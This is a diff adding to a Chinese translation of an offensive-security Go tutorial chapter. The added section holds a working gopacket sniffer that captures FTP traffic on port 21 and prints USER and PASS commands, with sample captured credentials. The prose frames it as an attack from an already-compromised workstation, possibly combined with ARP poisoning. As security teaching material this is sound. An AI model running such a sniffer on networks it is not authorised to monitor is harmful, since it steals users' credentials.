ch-8 Sniffing and Displaying Cleartext User Credentials

--- a/ch-8/第8章：网络包的处理：.md
+++ b/ch-8/第8章：网络包的处理：.md
@@ -169,5 +169,84 @@ PACKET: 74 bytes, wire length 74 cap length 74 @ 2020-04-26 08:44:43.086706 -050
 
 现在编译代码。复用其他工具的一些功能，以嗅探并明文显示用户凭证。
 
-现在，大多数组织使用交换网络进行操作，交换网络直接在两个端点之间发送数据，而不是广播发送，这使得在企业环境中被动地抓包变得更加困难。但是，接下来的明文嗅探攻击配合像 `Address Resolution Protocol (ARP) ` 毒剂这样的东西非常有用。
+现在，大多数组织使用交换网络进行操作，交换网络直接在两个端点之间发送数据，而不是广播发送，这使得在企业环境中被动地抓包变得更加困难。但是，接下来的明文嗅探攻击配合像 `Address Resolution Protocol (ARP) ` 毒剂这样的东西非常有用。一种可以强制端点与交换网络上的恶意设备通信的攻击，或者当偷偷嗅探从被害的用户工作站发出的出站流量时。本例中，假定已经攻击了用户工作站，并只抓取使用FTP的流量来保持代码的简洁。
 
+除了一些小的更改外，清单8-5中的代码几乎与清单8-3中的代码相同。
+
+```go
+package main
+
+import (
+	"bytes"
+	"fmt"
+	"log"
+
+	"github.com/google/gopacket"
+	"github.com/google/gopacket/pcap"
+)
+
+var (
+	iface    = "enp0s5"
+	snaplen  = int32(1600)
+	promisc  = false
+	timeout  = pcap.BlockForever
+	filter   = "tcp and dst port 21"
+	devFound = false
+)
+
+func main() {
+	devices, err := pcap.FindAllDevs()
+	if err != nil {
+		log.Panicln(err)
+	}
+
+	for _, device := range devices {
+		if device.Name == iface {
+			devFound = true
+		}
+	}
+	if !devFound {
+		log.Panicf("Device named '%s' does not exist\n", iface)
+	}
+
+	handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout)
+	if err != nil {
+		log.Panicln(err)
+	}
+	defer handle.Close()
+
+	if err := handle.SetBPFFilter(filter); err != nil {
+		log.Panicln(err)
+	}
+
+	source := gopacket.NewPacketSource(handle, handle.LinkType())
+	for packet := range source.Packets() {
+		appLayer := packet.ApplicationLayer()
+		if appLayer == nil {
+			continue
+		}
+		payload := appLayer.Payload()
+		if bytes.Contains(payload, []byte("USER")) {
+			fmt.Print(string(payload))
+		} else if bytes.Contains(payload, []byte("PASS")) {
+			fmt.Print(string(payload))
+		}
+	}
+}
+```
+
+清单 8-5: 抓取FTP身份验证凭据(https://github.com/blackhat-go/bhg/ch-8/ftp/main.go/)
+
+只更改了大约10行代码。首先，更改 **BPF** 过滤器为只抓取发送到21端口的流量（该端口一般用于FTP）。在处理包之前的剩余代码保持不变。
+
+要想处理包，先提取包的应用层并检查其是否存在，因为应用层含有FTP命令和数据。通过检查 `packet.ApplicationLayer()` 的响应值是否是nil来查找应用层。假设包中存在应用层，通过调用 `appLayer.Payload()` 从应用层中提取有效值（FTP命令/数据）。（提取并检查其他层和数据也用类似的方法，但是只需要应用层的值。）提取数据后检查是否有 `USER` 或 `PASS` 命令，表明这是登录序列的一部分。如果是就再屏幕上输出数据。
+
+下面是抓取一个FTP登录的示例：
+
+```shell
+$ go build -o ftp && sudo ./ftp 
+USER someuser
+PASS passw0rd
+```
+
+当然也可以优化代码。本例中，如果数据中含有 `USER` 或 `PASS` 就输出该数据。实际上，代码应该只搜索有效数据的开头部分，以消除当这些关键字作为在客户端和服务器之间传输的文件内容的一部分出现，或者是更长的单词(如PASSAGE或ABUSER)的一部分出现时的误报。鼓励您将该改进作为学习。
